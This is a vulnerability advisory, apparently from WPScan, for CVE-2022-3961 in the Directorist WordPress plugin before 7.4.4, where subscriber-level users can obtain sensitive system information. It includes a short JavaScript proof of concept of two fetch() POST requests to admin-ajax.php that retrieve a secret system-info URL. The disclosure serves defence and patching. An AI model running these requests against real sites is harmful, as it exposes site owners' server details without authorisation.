Lucene search
Lana CodesWPEX-ID:6AAD6454-DE1B-4304-9C14-05E28D08B253HistoryNov 28, 2022 - 12:00 a.m.
Directorist < 7.4.4 - Subscriber+ Sensitive Information Disclosure
2022-11-2800:00:00
Lana Codes
108
directorist version
sensitive information disclosure
system info exploit
fetch api
admin-ajax endpoint
0.001 Low
EPSS
Percentile
29.9%
The plugin does not prevent users with low privileges (like subscribers) from accessing sensitive system information.
fetch('http://wpscan.local/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=send_system_info',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
fetch('https://wpscan.local/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=generate_url',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
Then we get the secret url for system infoRelated
wpvulndb
wpvulndb
Directorist < 7.4.4 - Subscriber+ Sensitive Information Disclosure
2022-11-28 00:00:00
cve
cve
CVE-2022-3961
2022-12-19 14:15:11
cvelist
cvelist
prion
prion
Information disclosure
2022-12-19 14:15:00
nvd
nvd
CVE-2022-3961
2022-12-19 14:15:11